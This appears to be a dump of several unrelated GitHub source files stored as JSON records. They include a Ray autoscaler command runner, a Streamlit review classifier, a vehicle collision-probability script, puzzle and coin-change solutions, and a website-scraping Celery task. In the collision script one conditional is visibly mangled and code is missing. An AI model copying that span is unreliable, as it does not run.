__init__(self, log_prefix, namespace, node_id, auth_config,\n process_runner):\n\n self.log_prefix = log_prefix\n self.process_runner = process_runner\n self.node_id = node_id\n self.namespace = namespace\n self.kubectl = [\"kubectl\", \"-n\", self.namespace]\n\n def run(self,\n cmd=None,\n timeout=120,\n exit_on_fail=False,\n port_forward=None,\n with_output=False):\n if cmd and port_forward:\n raise Exception(\n \"exec with Kubernetes can't forward ports and execute\"\n \"commands together.\")\n\n if port_forward:\n if not isinstance(port_forward, list):\n port_forward = [port_forward]\n port_forward_cmd = self.kubectl + [\n \"port-forward\",\n self.node_id,\n ] + [\n \"{}:{}\".format(local, remote) for local, remote in port_forward\n ]\n logger.info(\"Port forwarding with: {}\".format(\n \" \".join(port_forward_cmd)))\n port_forward_process = subprocess.Popen(port_forward_cmd)\n port_forward_process.wait()\n # We should never get here, this indicates that port forwarding\n # failed, likely because we couldn't bind to a port.\n pout, perr = port_forward_process.communicate()\n exception_str = \" \".join(\n port_forward_cmd) + \" failed with error: \" + perr\n raise Exception(exception_str)\n else:\n logger.info(self.log_prefix + \"Running {}...\".format(cmd))\n final_cmd = self.kubectl + [\"exec\", \"-it\"]\n final_cmd += [\n self.node_id,\n \"--\",\n ]\n final_cmd += with_interactive(cmd)\n try:\n if with_output:\n return self.process_runner.check_output(\n \" \".join(final_cmd), shell=True)\n else:\n self.process_runner.check_call(\n \" \".join(final_cmd), shell=True)\n except subprocess.CalledProcessError:\n if exit_on_fail:\n quoted_cmd = \" \".join(final_cmd[:-1] +\n [quote(final_cmd[-1])])\n logger.error(\n self.log_prefix +\n \"Command failed: \\n\\n {}\\n\".format(quoted_cmd))\n sys.exit(1)\n else:\n raise\n\n def run_rsync_up(self, source, target):\n if target.startswith(\"~\"):\n target = \"/root\" + target[1:]\n\n try:\n self.process_runner.check_call([\n KUBECTL_RSYNC,\n \"-avz\",\n source,\n \"{}@{}:{}\".format(self.node_id, self.namespace, target),\n ])\n except Exception as e:\n logger.warning(self.log_prefix +\n \"rsync failed: '{}'. Falling back to 'kubectl cp'\"\n .format(e))\n self.process_runner.check_call(self.kubectl + [\n \"cp\", source, \"{}/{}:{}\".format(self.namespace, self.node_id,\n target)\n ])\n\n def run_rsync_down(self, source, target):\n if target.startswith(\"~\"):\n target = \"/root\" + target[1:]\n\n try:\n self.process_runner.check_call([\n KUBECTL_RSYNC,\n \"-avz\",\n \"{}@{}:{}\".format(self.node_id, self.namespace, source),\n target,\n ])\n except Exception as e:\n logger.warning(self.log_prefix +\n \"rsync failed: '{}'. Falling back to 'kubectl cp'\"\n .format(e))\n self.process_runner.check_call(self.kubectl + [\n \"cp\", \"{}/{}:{}\".format(self.namespace, self.node_id, source),\n target\n ])\n\n def remote_shell_command_str(self):\n return \"{} exec -it {} bash\".format(\" \".join(self.kubectl),\n self.node_id)\n\n\nclass SSHCommandRunner:\n def __init__(self, log_prefix, node_id, provider, auth_config,\n cluster_name, process_runner, use_internal_ip):\n\n ssh_control_hash = hashlib.md5(cluster_name.encode()).hexdigest()\n ssh_user_hash = hashlib.md5(getuser().encode()).hexdigest()\n ssh_control_path = \"/tmp/ray_ssh_{}/{}\".format(\n ssh_user_hash[:HASH_MAX_LENGTH],\n ssh_control_hash[:HASH_MAX_LENGTH])\n\n self.log_prefix = log_prefix\n self.process_runner = process_runner\n self.node_id = node_id\n self.use_internal_ip = use_internal_ip\n self.provider = provider\n self.ssh_private_key = auth_config[\"ssh_private_key\"]\n self.ssh_user = auth_config[\"ssh_user\"]\n self.ssh_control_path = ssh_control_path\n self.ssh_ip = None\n\n def get_default_ssh_options(self, connect_timeout):\n OPTS = [\n (\"ConnectTimeout\", \"{}s\".format(connect_timeout)),\n (\"StrictHostKeyChecking\", \"no\"),\n (\"ControlMaster\", \"auto\"),\n (\"ControlPath\", \"{}/%C\".format(self.ssh_control_path)),\n (\"ControlPersist\", \"10s\"),\n # Try fewer extraneous key pairs.\n (\"IdentitiesOnly\", \"yes\"),\n # Abort if port forwarding fails (instead of just printing to\n # stderr).\n (\"ExitOnForwardFailure\", \"yes\"),\n # Quickly kill the connection if network connection breaks (as\n # opposed to hanging/blocking).\n (\"ServerAliveInterval\", 5),\n (\"ServerAliveCountMax\", 3),\n ]\n\n return [\"-i\", self.ssh_private_key] + [\n x for y in ([\"-o\", \"{}={}\".format(k, v)] for k, v in OPTS)\n for x in y\n ]\n\n def get_node_ip(self):\n if self.use_internal_ip:\n return self.provider.internal_ip(self.node_id)\n else:\n return self.provider.external_ip(self.node_id)\n\n def wait_for_ip(self, deadline):\n while time.time() < deadline and \\\n not self.provider.is_terminated(self.node_id):\n logger.info(self.log_prefix + \"Waiting for IP...\")\n ip = self.get_node_ip()\n if ip is not None:\n return ip\n time.sleep(10)\n\n return None\n\n def set_ssh_ip_if_required(self):\n if self.ssh_ip is not None:\n return\n\n # We assume that this never changes.\n # I think that's reasonable.\n deadline = time.time() + NODE_START_WAIT_S\n with LogTimer(self.log_prefix + \"Got IP\"):\n ip = self.wait_for_ip(deadline)\n assert ip is not None, \"Unable to find IP of node\"\n\n self.ssh_ip = ip\n\n # This should run before any SSH commands and therefore ensure that\n # the ControlPath directory exists, allowing SSH to maintain\n # persistent sessions later on.\n try:\n os.makedirs(self.ssh_control_path, mode=0o700, exist_ok=True)\n except OSError as e:\n logger.warning(e)\n\n def run(self,\n cmd,\n timeout=120,\n exit_on_fail=False,\n port_forward=None,\n with_output=False):\n\n self.set_ssh_ip_if_required()\n\n ssh = [\"ssh\", \"-tt\"]\n\n if port_forward:\n if not isinstance(port_forward, list):\n port_forward = [port_forward]\n for local, remote in port_forward:\n logger.info(self.log_prefix + \"Forwarding \" +\n \"{} -> localhost:{}\".format(local, remote))\n ssh += [\"-L\", \"{}:localhost:{}\".format(remote, local)]\n\n final_cmd = ssh + self.get_default_ssh_options(timeout) + [\n \"{}@{}\".format(self.ssh_user, self.ssh_ip)\n ]\n if cmd:\n logger.info(self.log_prefix +\n \"Running {} on {}...\".format(cmd, self.ssh_ip))\n logger.info(\"Begin remote output from {}\".format(self.ssh_ip))\n final_cmd += with_interactive(cmd)\n else:\n # We do this because `-o ControlMaster` causes the `-N` flag to\n # still create an interactive shell in some ssh versions.\n final_cmd.append(quote(\"while true; do sleep 86400; done\"))\n\n try:\n if with_output:\n return self.process_runner.check_output(final_cmd)\n else:\n self.process_runner.check_call(final_cmd)\n except subprocess.CalledProcessError:\n if exit_on_fail:\n quoted_cmd = \" \".join(final_cmd[:-1] + [quote(final_cmd[-1])])\n raise click.ClickException(\n \"Command failed: \\n\\n {}\\n\".format(quoted_cmd)) from None\n else:\n raise click.ClickException(\n \"SSH command Failed. See above for the output from the\"\n \" failure.\") from None\n\n def run_rsync_up(self, source, target):\n self.set_ssh_ip_if_required()\n self.process_runner.check_call([\n \"rsync\", \"--rsh\",\n \" \".join([\"ssh\"] + self.get_default_ssh_options(120)), \"-avz\",\n source, \"{}@{}:{}\".format(self.ssh_user, self.ssh_ip, target)\n ])\n\n def run_rsync_down(self, source, target):\n self.set_ssh_ip_if_required()\n self.process_runner.check_call([\n \"rsync\", \"--rsh\",\n \" \".join([\"ssh\"] + self.get_default_ssh_options(120)), \"-avz\",\n \"{}@{}:{}\".format(self.ssh_user, self.ssh_ip, source), target\n ])\n\n def remote_shell_command_str(self):\n return \"ssh -o IdentitiesOnly=yes -i {} {}@{}\\n\".format(\n self.ssh_private_key, self.ssh_user, self.ssh_ip)\n\n\nclass NodeUpdater:\n \"\"\"A process for syncing files and running init commands on a node.\"\"\"\n\n def __init__(self,\n node_id,\n provider_config,\n provider,\n auth_config,\n cluster_name,\n file_mounts,\n initialization_commands,\n setup_commands,\n ray_start_commands,\n runtime_hash,\n process_runner=subprocess,\n use_internal_ip=False):\n\n self.log_prefix = \"NodeUpdater: {}: \".format(node_id)\n use_internal_ip = (use_internal_ip\n or provider_config.get(\"use_internal_ips\", False))\n self.cmd_runner = provider.get_command_runner(\n self.log_prefix, node_id, auth_config, cluster_name,\n process_runner, use_internal_ip)\n\n self.daemon = True\n self.process_runner = process_runner\n self.node_id = node_id\n self.provider = provider\n self.file_mounts = {\n remote: os.path.expanduser(local)\n for remote, local in file_mounts.items()\n }\n self.initialization_commands = initialization_commands\n self.setup_commands = setup_commands\n self.ray_start_commands = ray_start_commands\n self.runtime_hash = runtime_hash\n\n def run(self):\n logger.info(self.log_prefix +\n \"Updating to {}\".format(self.runtime_hash))\n try:\n with LogTimer(self.log_prefix +\n \"Applied config {}\".format(self.runtime_hash)):\n self.do_update()\n except Exception as e:\n error_str = str(e)\n if hasattr(e, \"cmd\"):\n error_str = \"(Exit Status {}) {}\".format(\n e.returncode, \" \".join(e.cmd))\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_UPDATE_FAILED})\n logger.error(self.log_prefix +\n \"Error executing: {}\".format(error_str) + \"\\n\")\n if isinstance(e, click.ClickException):\n return\n raise\n\n self.provider.set_node_tags(\n self.node_id, {\n TAG_RAY_NODE_STATUS: STATUS_UP_TO_DATE,\n TAG_RAY_RUNTIME_CONFIG: self.runtime_hash\n })\n\n self.exitcode = 0\n\n def sync_file_mounts(self, sync_cmd):\n # Rsync file mounts\n for remote_path, local_path in self.file_mounts.items():\n assert os.path.exists(local_path), local_path\n if os.path.isdir(local_path):\n if not local_path.endswith(\"/\"):\n local_path += \"/\"\n if not remote_path.endswith(\"/\"):\n remote_path += \"/\"\n\n with LogTimer(self.log_prefix +\n \"Synced {} to {}\".format(local_path, remote_path)):\n self.cmd_runner.run(\"mkdir -p {}\".format(\n os.path.dirname(remote_path)))\n sync_cmd(local_path, remote_path)\n\n def wait_ready(self, deadline):\n with LogTimer(self.log_prefix + \"Got remote shell\"):\n logger.info(self.log_prefix + \"Waiting for remote shell...\")\n\n while time.time() < deadline and \\\n not self.provider.is_terminated(self.node_id):\n try:\n logger.debug(self.log_prefix +\n \"Waiting for remote shell...\")\n\n self.cmd_runner.run(\"uptime\", timeout=5)\n logger.debug(\"Uptime succeeded.\")\n return True\n\n except Exception as e:\n retry_str = str(e)\n if hasattr(e, \"cmd\"):\n retry_str = \"(Exit Status {}): {}\".format(\n e.returncode, \" \".join(e.cmd))\n logger.debug(self.log_prefix +\n \"Node not up, retrying: {}\".format(retry_str))\n time.sleep(READY_CHECK_INTERVAL)\n\n assert False, \"Unable to connect to node\"\n\n def do_update(self):\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_WAITING_FOR_SSH})\n deadline = time.time() + NODE_START_WAIT_S\n self.wait_ready(deadline)\n\n node_tags = self.provider.node_tags(self.node_id)\n logger.debug(\"Node tags: {}\".format(str(node_tags)))\n if node_tags.get(TAG_RAY_RUNTIME_CONFIG) == self.runtime_hash:\n logger.info(self.log_prefix +\n \"{} already up-to-date, skip to ray start\".format(\n self.node_id))\n else:\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_SYNCING_FILES})\n self.sync_file_mounts(self.rsync_up)\n\n # Run init commands\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_SETTING_UP})\n with LogTimer(\n self.log_prefix + \"Initialization commands\",\n show_status=True):\n for cmd in self.initialization_commands:\n self.cmd_runner.run(cmd)\n\n with LogTimer(\n self.log_prefix + \"Setup commands\", show_status=True):\n for cmd in self.setup_commands:\n self.cmd_runner.run(cmd)\n\n with LogTimer(\n self.log_prefix + \"Ray start commands\", show_status=True):\n for cmd in self.ray_start_commands:\n self.cmd_runner.run(cmd)\n\n def rsync_up(self, source, target):\n logger.info(self.log_prefix +\n \"Syncing {} to {}...\".format(source, target))\n self.cmd_runner.run_rsync_up(source, target)\n\n def rsync_down(self, source, target):\n logger.info(self.log_prefix +\n \"Syncing {} from {}...\".format(source, target))\n self.cmd_runner.run_rsync_down(source, target)\n\n\nclass NodeUpdaterThread(NodeUpdater, Thread):\n def __init__(self, *args, **kwargs):\n Thread.__init__(self)\n NodeUpdater.__init__(self, *args, **kwargs)\n self.exitcode = -1\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/autoscaler/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":17175,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"32691387897","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport streamlit as st\n\n#verify if the user has a GPU\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#load the models with the tokenizer\ntokenizer_sent = AutoTokenizer.from_pretrained(\"nlptown/bert-base-multilingual-uncased-sentiment\")\nmodel_sent = AutoModelForSequenceClassification.from_pretrained(\"nlptown/bert-base-multilingual-uncased-sentiment\")\n\ntokenizer_racism = AutoTokenizer.from_pretrained(\"davidmasip/racism\")\nmodel_racism = AutoModelForSequenceClassification.from_pretrained(\"davidmasip/racism\")\n\ntokenizer_politic = AutoTokenizer.from_pretrained(\"Newtral/xlm-r-finetuned-toxic-political-tweets-es\")\nmodel_politic = AutoModelForSequenceClassification.from_pretrained(\"Newtral/xlm-r-finetuned-toxic-political-tweets-es\")\n\n#function to get the reviews from the url\ndef request_web(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n regex = re.compile('.*comment.*')\n results = soup.find_all('p', {'class': regex})\n reviews = [result.text for result in results]\n return reviews\n\n#function to create a dataframe with the reviews\ndef dataframe(reviews):\n df = pd.DataFrame(np.array(reviews), columns=['review'])\n return df\n\n#function to get the sentiment score of a review\ndef sentiment_score(review):\n tokens = tokenizer_sent.encode(review, return_tensors='pt', truncation=True, max_length=512)\n result = model_sent(tokens)\n return int(torch.argmax(result.logits)) + 1\n\n#function to get the racism score of a review\ndef racism_score(review):\n tokens = tokenizer_racism.encode(review, return_tensors='pt', truncation=True, max_length=512)\n result = model_racism(tokens)\n return int(torch.argmax(result.logits))\n\n#function to get the political score of a review\ndef politic_score(review):\n tokens = tokenizer_politic.encode(review, return_tensors='pt', truncation=True, max_length=512)\n result = model_politic(tokens)\n return int(torch.argmax(result.logits))\n\n#function to get the average sentiment score of the reviews\ndef average(df):\n df['Sentiment'] = df['review'].apply(lambda x: sentiment_score(x))\n df['Racism'] = df['review'].apply(lambda x: racism_score(x))\n df['Politic'] = df['review'].apply(lambda x: politic_score(x))\n racism_proportion = df['Racism'].sum() / len(df['Racism'])\n politic_proportion = df['Politic'].sum() / len(df['Politic'])\n average = df['Sentiment'].mean()\n racism_comments = df[df['Racism'] == 1]['review'].tolist()\n politic_comments = df[df['Politic'] == 1]['review'].tolist()\n sad_comments = df[df['Sentiment'] == 1]['review'].tolist()\n return average, racism_comments, politic_comments, sad_comments, racism_proportion, politic_proportion\n\n#main function\ndef main():\n st.title(\"Analysis of Sentiment, Racism and Political Comments\")\n st.write(\"Enter a URL to scrape reviews and get the results!\")\n\n url = st.text_input(\"Enter the URL:\", \"\")\n\n if url:\n try:\n reviews = request_web(url)\n df = dataframe(reviews)\n average_score, racism_comments, politic_comments, sad_comments, racism_proportion, politic_proportion = average(df)\n \n plot_sentiment = df['Sentiment'].value_counts().plot(kind='bar')\n st.pyplot(plot_sentiment.figure)\n\n st.write(\"Average Sentiment Score (from 1 to 5): {:.2f}\".format(average_score))\n st.subheader(\"Sad Comments:\")\n for comment in sad_comments:\n st.write(\"- \" + comment)\n\n plot_racism = df['Racism'].value_counts().plot(kind='pie')\n st.pyplot(plot_racism.figure)\n\n st.write(\"Proportion of racism comments: {:.2f}\".format(racism_proportion))\n st.subheader(\"Racism Comments:\")\n for comment in racism_comments:\n st.write(\"- \" + comment)\n\n plot_politic = df['Racism'].value_counts().plot(kind='barh')\n st.pyplot(plot_politic.figure)\n \n st.write(\"Proportion of political comments: {:.2f}\".format(politic_proportion))\n st.subheader(\"Political Comments:\")\n for comment in politic_comments:\n st.write(\"- \" + comment)\n \n \n \n except Exception as e:\n st.error(f\"Error occurred: {e}\")\n st.write(\"Make sure the provided URL is valid and contains review elements.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sergioq2/TextClassification_HuggingFace_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1544840918","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport csv\nimport math\nimport copy\nimport scipy.stats as stats\n\n\n\nC_max = 50 # 车辆数\nT_max = 1200\nQ_max = 2000\nL = 20\nd_sen = 500\nS = 2\na = 0\nb = 0\nc = 0\nd = 0\ne = 0\nN_bn = 0\nN_oa = 0\nN_A = 0\nN_D = 0\nN_ccr = 0\n\n\nfile = open('distance_data_50', 'r')\nd = file.read().split()\ndistance_1 = list(float(i) for i in d)\ndistance_2 = []\nfor i in range(len(distance_1)):\n distance_2.append(np.array(distance_1[i]))\ndhk = np.array(distance_2) \n\n\nif L==100:\n f = 10\n Rl = 5\n Rh = 15\nelif L==50:\n f = 20\n Rl = 10\n Rh = 30\nelif L==20:\n f = 50\n Rl = 25\n Rh = 75\n\nC_priority = np.zeros(C_max)\nC_fairness_random = np.zeros(C_max)\nC_fairness_proposed = np.zeros(C_max)\nT_queue_proposed = np.zeros(T_max)\nT_queue_random = np.zeros(T_max)\nT_compare_queue1 = np.zeros(T_max)\nT_compare_queue2 = np.zeros(T_max)\nT_client_choice_proposed = np.zeros(T_max)\nT_client_choice_random = np.zeros(T_max)\nT_accuracy_proposed = np.zeros(T_max)\nT_accuracy_random = np.zeros(T_max)\nT_departure = np.zeros(T_max)\nT_alive_client_proposed = np.zeros(T_max)\nT_alive_client_random = np.zeros(T_max)\ns_star_proposed = []\ns_star_random = []\ns_star_static = []\nTotal_Data_Proposed = 0\nTotal_Data_Random = 0\ncopy_T_queue_proposed = []\ncopy_T_queue_random = []\nepsilon_1 = np.zeros(C_max)\na_E_1 = np.zeros(C_max)\nr_1 = np.zeros(C_max)\nDelay = np.zeros(C_max)\nd_kr = np.zeros(C_max)\nd_ir = np.zeros(C_max)\nd_ki = np.zeros(C_max)\nK_S = np.zeros(C_max)\nd_1 = np.zeros(C_max)\nd_2 = np.zeros(C_max)\nd_2 = np.zeros(C_max)\nK_C = np.zeros(C_max-1)\nP_same = np.zeros(C_max-1)\nC_n = [10 for i in range(C_max)]\nC_distance = np.zeros(C_max)\n\n\nfo = open('int_50_50_23_2.txt', 'r')\n\n\n\nP_col = np.zeros(C_max)\nfor i in range(C_max):\n d_kr[i] = abs(500 - dhk[i])\nfor j in range(C_max): \n d_ir = copy.deepcopy(d_kr) \n d_ir[j] = 0 \n d_ki = abs(dhk-dhk[j])\n d_ki = np.delete(d_ki, j)\n N_total = (1000*S)/f\n N_lc = 0.2*N_total\n P_rc0 = 1/(Rh-Rl)\n a = np.sum(d_ki<=d_sen)\n K_S[j] = a\n for k in range(C_max-1):\n d_1 = copy.deepcopy(dhk)\n d_1 = np.delete(d_1, j)\n d_2 = copy.deepcopy(dhk)\n b = d_2[j] + d_sen\n c = d_1[k] + d_sen\n d = d_2[j] - d_sen\n e = d_1[k] - d_sen\n if b > 1000:\n b = 1000\n if d < 0:\n d = 0\n if c > 1000:\n c = 1000\n if e < 0:\n e = 0\n g = 0 \n for l in range(C_max-2):\n d_3 = copy.deepcopy(d_1)\n d_3 = np.delete(d_3, k)\n if max(d,e)= 1:\n N_ccr = (N_D-N_A)*(1-(1/N_D))**N_A\n print(N_ccr)\n else:\n N_ccr = 0\n if d_ki[m]<=d_sen:\n h = (P_rc0*N_ccr)/(N_lc*N_lc)\n P_same[m] = h\n elif d_ki[m]>d_sen:\n h = N_ccr/(N_lc*N_lc)\n P_same[m] = h \n P_int = []\n line = fo.readline()\n P_int_1 = []\n P_int_2 = line.split(',')\n for x in P_int_2:\n newx = float(x)\n P_int_1.append(newx)\n P_int_1 = np.array(P_int_1)\n P_int = np.array(P_int_1)\n col = np.zeros(C_max)\n col = P_same*P_int\n prod = 0\n prod = 1 - np.prod(1-col)\n P_col[j] = prod\n# print(P_col)","repo_name":"qiongwu86/Vehicle-selection-for-C-V2X","sub_path":"col.py","file_name":"col.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6590592346","text":"# strings\nlines = [l.strip() for l in open('input') if l]\nvalues = [int(v) for v in list(lines[0])]\n\npattern = [0, 1, 0, -1]\n\n\ndef run_thing(input):\n current_permutation = list(input)\n next_permutation = []\n\n for _ in range(100):\n current_permutation = [0] + current_permutation\n\n track = []\n for index, _ in enumerate(current_permutation):\n # index = len(current_permutation) - index - 1\n amount = 0\n pattern_index = 0\n\n itt_index = 0\n itt_inc = index + 1\n\n while itt_index < len(current_permutation):\n end_index = min(itt_index + itt_inc, len(current_permutation))\n if pattern[pattern_index] == 0:\n pass\n elif pattern[pattern_index] == 1:\n amount += sum(current_permutation[itt_index:end_index])\n elif pattern[pattern_index] == -1:\n amount -= sum(current_permutation[itt_index:end_index])\n\n pattern_index += 1\n pattern_index %= len(pattern)\n itt_index += itt_inc\n\n next_permutation.append(int(str(amount)[-1]))\n track .append(amount)\n\n current_permutation = next_permutation[:-1]\n next_permutation = []\n\n return current_permutation[:-1]\n\n# parts\ndef part1():\n result = run_thing(values)\n\n return ''.join([str(v) for v in result[:8]])\n\n\ndef part2():\n input = values * 10000\n\n offset_index = int(''.join(map(str, input[:7])))\n\n sub_values = input[offset_index:]\n\n for _ in range(100):\n current_sum = 0\n for i in range(len(sub_values) - 1, -1, -1):\n current_sum += sub_values[i]\n sub_values[i] = current_sum % 10\n\n return ''.join([str(v) for v in sub_values[:8]])\n\n\nprint('Part 1: ', part1()) # 25131128\nprint('Part 2: ', part2())\n","repo_name":"victorkirov/aoc","sub_path":"2019/16/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526068887","text":"\"\"\"\nGiven array of pos ints representing denominations, and a single non-negative\nint representing a target amount of money. Write function to return number\nof ways to make change for that target amount.\n\nSample input: 6,[1,5]\nSample output: 2 (1x1 + 1x5 and 6x1)\n\"\"\"\n\nclass Prob:\n '''\n Recursive, brute force.\n Let n = starting amount from which to make change.\n Time complexity: O(2^n), since each helper call creates 2 other helper calls.\n Space complexity: O(n), since there at most n recursive calls on the call stack.\n https://algorithms.tutorialhorizon.com/dynamic-programming-coin-change-problem/\n '''\n @staticmethod\n def numWaysMakeChangeRec(n, denoms):\n \n def helper(n, denoms, d):\n if n < 0:\n return 0\n if n == 0:\n return 1\n \n # If there are no denominations left, there are no ways to make change.\n if d < 0:\n return 0\n \n # solution that contain at least 1 denoms[d] denomination\n # d is passed into helper again b/c there could be another denom[d] that is selected.\n nwWithDenom = helper(n-denoms[d], denoms, d)\n \n # solution that doesn't contain denoms[d] denomination\n # d-1 is passed into helper b/c on the next call, d cannot be chosen.\n nwWithoutDenom = helper(n, denoms, d-1)\n \n return nwWithDenom + nwWithoutDenom\n \n return helper(n, denoms, len(denoms)-1)\n \n '''\n Time complexity: O(n), since for each helper call, there is a (1) previously solved memoized solution that is returned.\n Space complexity: O(n*len(denom)), since the memo is a (n+1)*len(denom) matrix.\n '''\n @staticmethod\n def numWaysMakeChangeRecMemo(n, denoms):\n \n def helper(n, denoms, d, memo):\n print(\"n={}, d={}\".format(n,d))\n print(\"memo:\")\n for row in memo:\n print(\"\\t\",row)\n \n if n < 0:\n return 0\n if n == 0:\n return 1\n if d < 0:\n return 0\n \n if memo[n][d] != None:\n print(\"found memo: \", memo[n][d])\n return memo[n][d]\n \n nwWithDenom = helper(n-denoms[d], denoms, d, memo)\n nwWithoutDenom = helper(n, denoms, d-1, memo)\n memo[n][d] = nwWithDenom + nwWithoutDenom\n \n return memo[n][d]\n \n # init memo\n memo = [[None for _ in range(len(denoms))] for _ in range(n+1)]\n return helper(n, denoms, len(denoms)-1, memo)\n \n '''\n Time complexity: O(len(denoms)^n), since for each helper call, there are len(denom) helper calls.\n Space complexity: O(n), there are at most n items on the recursive call stack.\n '''\n @staticmethod\n def numWaysMakeChangeRec2(n, denoms):\n \n def helper(n, denoms, d):\n if n < 0:\n return 0\n if n == 0:\n return 1\n \n nw = 0\n for i in range(d+1):\n nw += helper(n-denoms[i], denoms, i)\n \n return nw\n \n return helper(n, denoms, len(denoms)-1)\n \n '''\n Time complexity: O(n)\n Space complexity: O(n*len(denoms))\n '''\n @staticmethod\n def numWaysMakeChangeRec2Memo(n, denoms):\n def helper(n, denoms, d, memo):\n if n < 0:\n return 0\n if n == 0:\n return 1\n \n if memo[n][d] != None:\n print(\"memo found: \", memo[n][d])\n return memo[n][d]\n \n nw = 0\n for i in range(d+1):\n nw += helper(n-denoms[i], denoms, i, memo)\n memo[n][d] = nw\n \n return memo[n][d]\n \n memo = [[None for _ in range(len(denoms))] for _ in range(n+1)]\n return helper(n, denoms, len(denoms)-1, memo) \n\n \"\"\"\n Complexity\n Time: O(n*len(denoms)), because you need for loop for denoms, and for loop for n\n Space: O(n), because you need an array to store up to n values.\n \"\"\"\n @staticmethod\n def numWaysMakeChangeDP(n, denoms):\n denoms = sorted(denoms)\n \n # init array to keep track of ways to make change up to n\n waysForAmt = [0] * (n+1)\n waysForAmt[0] = 1 # because for n=0, there is only 1 way to make change, and that is with no coins.\n #print(\"waysForAmt: \", waysForAmt)\n \n for d in range(len(denoms)):\n for i in range(n+1):\n denom = denoms[d]\n print(\"denom: {}, i: {}\".format(denom, i))\n if i >= denom:\n waysForAmt[i] += waysForAmt[i-denom]\n print(\"waysForAmt: \", waysForAmt)\n \n # the last value will result in the total num of ways to make change\n return waysForAmt[-1]\n \n @staticmethod\n def test1(alg):\n n = 6\n denoms = [1,5]\n alg(n, denoms)\n \n @staticmethod\n def test2(alg):\n n = 9\n denoms = [5,1]\n alg(n, denoms)\n \n @staticmethod\n def test3(alg):\n n = 25\n denoms = [1,5,10,25] # correct ans: 13\n \n #n = 6\n #denoms = [1,5]\n ways = alg(n, denoms)\n print(\"test3: ways: \", ways)\n \n @staticmethod\n def test4(alg):\n n = 0\n denoms = [1,2,3,4]\n ways = alg(n, denoms)\n print(\"test4: ways: \", ways)\n\n#alg = Prob.numWaysMakeChangeRec\n#alg = Prob.numWaysMakeChangeRecMemo\n#alg = Prob.numWaysMakeChangeRec2\n#alg = Prob.numWaysMakeChangeRec2Memo\nalg = Prob.numWaysMakeChangeDP\n\n#Prob.test1(alg)\n#Prob.test2(alg)\nProb.test3(alg)\n#Prob.test4(alg)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/coin_change_num_ways.py","file_name":"coin_change_num_ways.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11299539503","text":"import csv\nimport hashlib\nimport requests\nimport urllib.request\nimport zipfile\nfrom base64 import urlsafe_b64encode\nfrom bs4 import BeautifulSoup\nfrom celery import shared_task\nfrom django.conf import settings\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\nfrom api import models\n\n\nWEBSITES_TO_PARSE_COUNT = 4\n\n\ndef webshrinker_categories_v3(access_key, secret_key, url=b\"\", params={}):\n params['key'] = access_key\n\n request = \"categories/v3/{}?{}\".format(urlsafe_b64encode(url).decode('utf-8'), urlencode(params, True))\n request_to_sign = \"{}:{}\".format(secret_key, request).encode('utf-8')\n signed_request = hashlib.md5(request_to_sign).hexdigest()\n\n return \"https://api.webshrinker.com/{}&hash={}\".format(request, signed_request)\n\n\n@shared_task\ndef update_websites():\n url = 'http://s3.amazonaws.com/alexa-static/top-1m.csv.zip'\n filehandle, _ = urllib.request.urlretrieve(url)\n zip_file_object = zipfile.ZipFile(filehandle, 'r')\n first_file = zip_file_object.namelist()[0]\n file = zip_file_object.open(first_file)\n with open('websites.csv', 'wb') as f:\n f.write(file.read())\n with open('websites.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n models.Website.objects.all().delete()\n models.WebsiteCategory.objects.all().delete()\n models.WebPage.objects.all().delete()\n i = 0\n for row in reader:\n alexa_rank, url = row\n update_website(alexa_rank, url)\n i += 1\n if i >= WEBSITES_TO_PARSE_COUNT:\n break\n\n\ndef update_website(alexa_rank, url):\n api_url = webshrinker_categories_v3(settings.WEBSHIRNKER_ACCESS_KEY,\n settings.WEBSHRINKER_SECRET_KEY,\n url.encode('utf-8'))\n response = requests.get(api_url)\n if response.status_code != 200:\n return\n data = response.json()\n try:\n category_data = data['data'][0]['categories'][0]\n except IndexError:\n return\n category, _ = models.WebsiteCategory.objects.get_or_create(\n name=category_data['id'],\n defaults={'description': category_data['label']}\n )\n title, meta_description = get_url_meta(url)\n website, _ = models.Website.objects.get_or_create(\n url=url,\n defaults={'title': title,\n 'meta_description': meta_description,\n 'alexa_rank': alexa_rank,\n 'category': category}\n )\n\n\ndef get_url_meta(url):\n url = 'https://' + url\n response = requests.get(url)\n soup = BeautifulSoup(response.text, features='html.parser')\n title = soup.find('title')\n description = soup.find('meta', attrs={'name': 'description'})\n if title is None:\n title = ''\n else:\n title = title.contents[0]\n if description is None:\n description = ''\n else:\n description = description.get('content')\n return title, description\n","repo_name":"wieczorek1990/websites","sub_path":"websites/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 